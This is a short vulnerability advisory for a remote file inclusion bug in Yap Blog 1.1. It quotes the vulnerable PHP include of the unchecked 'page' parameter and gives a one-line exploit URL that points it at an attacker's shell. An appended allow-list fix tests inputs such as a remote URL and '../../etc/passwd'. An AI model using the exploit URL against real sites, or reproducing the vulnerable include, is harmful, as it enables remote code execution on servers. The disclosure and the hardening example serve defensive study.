*Description: Yap Blog 1.1 Remote File Include (RFI)*

> Script Name: Yap Blog 1.1
> Author: THE_MILLER
> Contact: the_miller[at]linuxmail.org
> Download URL: http://wildmary.net-sauvage.com/share/yap1.1.tar.gz
> Bug Type: Remote File Inclusion
> Bug In: index.php
> Vulnerable Code:
>
>     <?php
>     // The request-supplied 'page' value is passed to include unchecked.
>     if (isset($_GET['page']))
>     {
>         include ($_GET['page'].".php");
>     }
>     else
>     {
>         include ("accueil.php");
>     }
>     ?>
>
> Exploit: http://www.hedefsite.com/[path]/index.php?page=[Sh3llAdresin]
>
> THE_MILLER
> //Greetz to: BuRaK www.cyber-security.org
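
A hardened form of the `index.php` page selection quoted in the advisory, as an added example that is not part of the original advisory or of Yap Blog's own code: the `page` parameter is used only as a key into a fixed allow-list, so no request data reaches `include`. The `resolve_page` helper and every page name other than `accueil` are hypothetical.

```php
<?php
declare(strict_types=1);

// Fixed allow-list: request value => file on disk. Only "accueil" comes from
// the advisory; the other entries are hypothetical page names.
const PAGES = [
    'accueil'  => 'accueil.php',
    'archives' => 'archives.php',
    'contact'  => 'contact.php',
];

/**
 * Map the raw ?page= value to a file path built only from allow-list entries.
 * Anything else (URLs, ../ sequences, arrays from ?page[]=, missing values)
 * falls back to the default page, so request data never reaches include.
 */
function resolve_page($requested, string $baseDir): string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        $requested = 'accueil';
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];
}

// In index.php the vulnerable block would become:
//     include resolve_page($_GET['page'] ?? null, __DIR__);
//
// allow_url_include = Off in php.ini (the default) stops include from fetching
// URLs, but it does not stop local file inclusion, so the allow-list is
// still needed.

// Constructed sample inputs, run from the command line to show the mapping.
if (PHP_SAPI === 'cli') {
    $samples = ['accueil', 'contact', 'http://example.invalid/x', '../../etc/passwd', ['x'], null];
    foreach ($samples as $sample) {
        $shown = json_encode($sample, JSON_UNESCAPED_SLASHES);
        printf("%-28s => %s\n", $shown, basename(resolve_page($sample, __DIR__)));
    }
}
```

Run from the CLI, the two allow-listed names map to their own files and every other sample input resolves to `accueil.php`.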